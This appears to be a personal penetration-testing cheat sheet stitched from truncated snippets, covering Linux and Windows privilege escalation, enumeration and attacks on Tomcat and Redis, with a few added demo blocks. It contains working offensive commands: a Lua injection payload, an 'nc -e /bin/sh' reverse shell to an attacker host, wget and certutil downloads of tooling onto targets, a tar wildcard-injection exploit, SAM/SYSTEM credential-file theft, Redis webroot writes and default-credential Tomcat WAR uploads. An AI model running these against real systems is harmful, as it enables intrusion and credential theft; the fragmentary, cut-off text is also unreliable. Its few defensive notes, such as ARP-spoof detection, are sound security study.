Logrotate exploit RCE until 12.8.1
Runs on port 9001 by default. Default HTTP auth credentials: user / 123
https://www.syhunt.com/en/index.php?n=Articles.LuaVulnerabilities
Notes: A Lua line comment starts with -- (Lua has no // comment). Append it after the injection so the remainder of the original statement is ignored:
  index?file=bla');os.execute('nc...')--
Prepare your own system:
  cd p151.general.1
  ./scripts/update_privesc_scripts.sh
  cd scripts/privesc/linux
  python -m SimpleHTTPServer 80
Prepare the target:
  cd /dev/shm
  wget http://$attackerip/_ex.tar
  tar xf _ex.tar
  script          // records the whole session into ./typescript
Now execute the scripts:
  LinPeas: ./linpeas.sh
  LinEnum: ./LinEnum.sh
  linux-smart-enumeration: ./lse.sh -l1
  linux-exploit-suggester-2: ./linux-exploit-suggester-2.pl
  sudo-killer: ./SUDO_KILLERv2.0.5.sh
  linuxprivchecker: ./linuxprivchecker.py
Finally: copy the typescript file to the PentestManager!
Additional ideas
Environment exploitation
Interpolation exploitation
Prerequisites:
Then, create files in the directory whose names look like parameters of the program. When the shell expands the wildcard, the program receives those filenames as arguments and interprets them as options. Example: assume there is a call like this in a script:
  tar czf /tmp/backup.tar.gz *
The script is in /home/peter and because we are this…
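The tar case above, reproduced end to end as an added example (this is not from the original notes). It builds a throw-away directory containing the attacker's option-named files, runs the victim's backup line once as written (vulnerable) and once with -- in front of the wildcard (the fix), and reports whether the planted command ran. It assumes GNU tar, since --checkpoint and --checkpoint-action are GNU extensions; the payload, directory names and marker file are constructed for the demo.

```shell
# Added example, not part of the original notes.
# Assumes GNU tar. Everything happens inside a mktemp -d directory.

run_backup_from() {
  # $1 = directory the victim backs up
  # $2 = "star"     -> the vulnerable line from the note: tar czf ... *
  #      "dashdash" -> hardened: '--' ends option parsing, so filenames
  #                    that look like options are treated as operands
  (
    cd "$1" || exit 1
    case "$2" in
      star)     tar czf "$1.tar.gz" *    2>/dev/null ;;
      dashdash) tar czf "$1.tar.gz" -- * 2>/dev/null ;;
    esac
  ) || true
}

wildcard_demo() {
  mode=${1:-star}
  work=$(mktemp -d) || return 1
  src="$work/backup_src"; marker="$work/marker"
  mkdir "$src"
  echo "some data" > "$src/legit.txt"           # the file the victim wants backed up
  # Attacker-controlled files: their *names* become tar options once the
  # shell expands '*'. The payload script just drops a marker file.
  printf 'echo pwned > %s\n' "$marker" > "$src/shell.sh"
  touch -- "$src/--checkpoint=1"
  touch -- "$src/--checkpoint-action=exec=sh shell.sh"
  run_backup_from "$src" "$mode"
  if [ -f "$marker" ]; then cat "$marker"; else echo "not executed"; fi
  rm -rf "$work"
}

# wildcard_demo star      -> prints "pwned"        (payload ran as tar's user)
# wildcard_demo dashdash  -> prints "not executed" (the '--' fix)
```

Pathname expansion is not subject to word splitting, so the file name with a space in it reaches tar as a single argument exactly as the attacker created it. Besides --, writing ./* also defuses the trick because every expanded name then starts with ./ rather than -.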
If your console is narrow, widen it at the beginning:
  stty rows 50 cols 200
Consider directly spawning another reverse shell:
  nc -e /bin/sh $attackerip 4444 &
Basic enumeration of the host:
  id
  groups
  cat /etc/passwd
  cat /etc/group
  cat /etc/hosts
  cat /etc/fstab
  uname -a      // Check for kernel exploits
                // ALSO search for kernel exploits with the OS name!
                // If this…
Important notes
Copy+paste
For Linux:
  base64 r > r.b64
  ...
  base64 --decode -i r.b64 > r.tar
For Windows (one echo per line, so the text can be pasted into cmd):
  base64 p64.exe | sed 's/^\(.*\)$/echo \1 >> b64/'
  ...
  certutil -encode file.exe b64.txt
  certutil -decode b64.txt file.exe
Alternative (Python 2 only, the base64 codec was removed in Python 3):
  python -c "open('test.b64','wb').write(open('test.txt').read().encode('base64'))"
  ...
  python -c "open('test.txt','wb').write(open('test.b64').read().decode('base64'))"
Alternative:
  python -m base64 -e test > test.b64
  ...
  python -m base64…
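The copy+paste transfer above as an added example (not from the original notes): it encodes a constructed binary, rewrites every line into an echo ... >> command the way the sed one-liner does, replays those commands as the receiving side would, strips stray carriage returns that terminals tend to add, and checks the SHA-256 on both ends. The 4 KiB random payload and the file names are constructed for the demo; it assumes GNU or BusyBox coreutils (base64, sha256sum, mktemp).

```shell
# Added example, not part of the original notes.
# Sender and receiver are simulated in one temp directory.

b64_transfer_demo() {
  work=$(mktemp -d) || return 1
  head -c 4096 /dev/urandom > "$work/r.tar"        # constructed "binary"
  before=$(sha256sum "$work/r.tar" | cut -d' ' -f1)

  # Sender: encode (76-column lines survive most terminals), then turn
  # every line into an 'echo <line> >> r.b64' command. Base64 only emits
  # [A-Za-z0-9+/=], so the unquoted echo argument is shell-safe.
  base64 "$work/r.tar" \
    | sed 's/^\(.*\)$/echo \1 >> r.b64/' > "$work/paste.txt"

  # Receiver: "paste" the commands (here: run them), remove any \r a
  # terminal or clipboard may have added, decode, and compare hashes.
  (cd "$work" && sh paste.txt)
  tr -d '\r' < "$work/r.b64" | base64 -d > "$work/r.restored"
  after=$(sha256sum "$work/r.restored" | cut -d' ' -f1)
  rm -rf "$work"
  [ "$before" = "$after" ] && echo match || echo MISMATCH
}

# b64_transfer_demo   -> prints "match"
```

Always compare a hash after a paste transfer: a single dropped or duplicated line decodes without error into a silently corrupted file.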
Execution
If you cannot execute an exe file, try these options:
Windows firewall / netsh
Check the firewall state:
  netsh advfirewall show currentprofile
  netsh advfirewall show state
If the firewall is active, list the configuration:
  netsh advfirewall show config
Example of adding an exception to the firewall from an administrator command line:
  C:\Windows\temp> netsh advfirewall firewall…
Grab the SAM and SYSTEM files:
  %windir%\repair\sam
  %windir%\System32\config\RegBack\SAM
  %windir%\system32\config\SAM
  %windir%\repair\system
  %windir%\System32\config\RegBack\system
  %windir%\system32\config\system
(Re-)run the credential retrievers from the script page.
PuTTY stores session information in the registry: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Prepare your own system:
  cd p151.general.1/scripts/privesc/windows
  python -m SimpleHTTPServer 80
Prepare the target (cmd expands %NTPSRV%, not $NTPSRV):
  set NTPSRV=$ownIp
  mkdir C:\Windows\System32\spool\drivers\color\wsc
  cd C:\Windows\System32\spool\drivers\color\wsc
Download most scripts at once (>30 MB!):
  certutil.exe -urlcache -split -f "http://%NTPSRV%/7za.exe"
  certutil.exe -urlcache -split -f "http://%NTPSRV%/_ex.zip"
  7za.exe x _ex.zip
WinPeas (Github):
  winPEAS.bat
  winPEASx86.exe
  winPEASx64.exe
Powerless (Github):
  certutil.exe -urlcache -split -f "http://%NTPSRV%/Powerless.bat" Powerless.bat
  Powerless.bat
Windows Exploit Suggester NG (Github)…
dir
General / usual commands:
Remember to use dir /R /as /ah (/R also lists alternate data streams; in PowerShell dir is Get-ChildItem, so use -Force there to include hidden files).
tree
Start with creating a list of all directories and files, and download it. It is much easier to search in a local editor, and the listing is kept for later reference as well.
  tree c:\ > C:\Windows\Temp\dsys\dirs.txt
  dir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt
(Download the files)…
General system enumeration
Get general information about the OS:
  systeminfo
Get the environment variables:
  set
Enumerate cached credentials:
  cmdkey /list
If the current system is not known yet, try to determine the version via one of the following files:
Process enumeration:
  tasklist /V
  tasklist /V | find "cmd.exe"      // Search for a command
  tasklist /V /fi "USERNAME eq NT…
After these steps, more things to do:
Work with processes
For enumeration of processes, see the Basic Windows system enumeration post.
Kill a process:
  taskkill /PID $pid
  taskkill /IM notepad.exe
  pskill /accepteula $pid           // with the Sysinternals tools
Suspend and resume a running process with the Sysinternals tools:
  pssuspend /accepteula notepad.exe
  ...
  pssuspend /accepteula -r notepad.exe
Work with DLLs
Show all…
Enumeration
Mandatory
Try to check out the repository:
  svn checkout svn://$target
Optional
Check all branches.
Go through each revision (use grep widely!).
Add a new file which could be accessible via the web.
Blue team
Use knockd (port knocking) to hide SSH.
List the ARP cache and check whether multiple IPs map to the same physical (MAC) address; that pattern suggests an ARP-spoofing MitM attack is in progress.
More secure development
If an attacker can write files but not directories, it could be a good idea to store sensitive files in another subdirectory. If this…
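The ARP-cache check above, turned into detection logic as an added example (not from the original notes): an awk filter that reads ip neigh or arp -n output and prints every MAC address that answers for more than one IPv4 address. The embedded neighbour table is constructed for the demo; the addresses in it are not real hosts.

```shell
# Added example, not part of the original notes.
# Input: lines from 'ip neigh' (field after "lladdr") or net-tools 'arp -n'
# (field after "ether"). Constructed sample so the check runs offline.

SAMPLE_NEIGH='10.0.0.1 dev eth0 lladdr 52:54:00:aa:bb:01 REACHABLE
10.0.0.7 dev eth0 lladdr 52:54:00:aa:bb:07 STALE
10.0.0.9 dev eth0 lladdr 52:54:00:aa:bb:07 REACHABLE
10.0.0.20 dev eth0 lladdr 52:54:00:aa:bb:20 DELAY
fe80::1 dev eth0 lladdr 52:54:00:aa:bb:01 router REACHABLE'

# Prints "MAC ip1 ip2 ..." for each MAC seen behind more than one IPv4 entry.
# IPv6 entries are skipped on purpose: a router legitimately has its IPv4
# address and its fe80:: link-local address on the same MAC.
find_duplicate_macs() {
  awk '
    $1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {
      mac = ""
      for (i = 1; i <= NF; i++)
        if ($i == "lladdr" || $i == "ether") mac = tolower($(i + 1))
      if (mac != "") { ips[mac] = ips[mac] " " $1; count[mac]++ }
    }
    END { for (m in count) if (count[m] > 1) print m ips[m] }
  '
}

# Live use:  ip neigh | find_duplicate_macs     (or: arp -n | find_duplicate_macs)
check_sample() { printf '%s\n' "$SAMPLE_NEIGH" | find_duplicate_macs; }
# check_sample -> "52:54:00:aa:bb:07 10.0.0.7 10.0.0.9"
```

Treat a hit as a signal, not proof: a host carrying IP aliases or a VRRP/HSRP virtual address also shows one MAC for several IPs. The tell-tale of spoofing is the gateway's IP suddenly sharing a MAC with an ordinary workstation, so compare against a known-good snapshot of the cache.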
Enumeration
Mandatory
Check on HTTP port 8080 whether /manager is accessible (default credentials: tomcat / s3cret or admin / admin). If yes, upload a reverse-shell WAR file.
Optional
Try to brute-force the manager login with msf> use scanner/http/tomcat_mgr_login.
Enumeration
Mandatory
Try to connect:
  telnet $target 6379     // or: redis-cli -h $target
  ...
  info
  CONFIG GET *
  system.exec "id"
Try to check whether you can determine the existence of directories (the server's reply tells you):
  config set dir /var/www/htdocs
  -ERR Changing directory: No such file or directory
  config set dir /etc
  +OK
Try to write. General commands:
  config set dir /var/www/html
  +OK
  config set dbfilename t.txt
  +OK
  set test "hallo"
  +OK
  save
  +OK
Possible places: Upload a…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';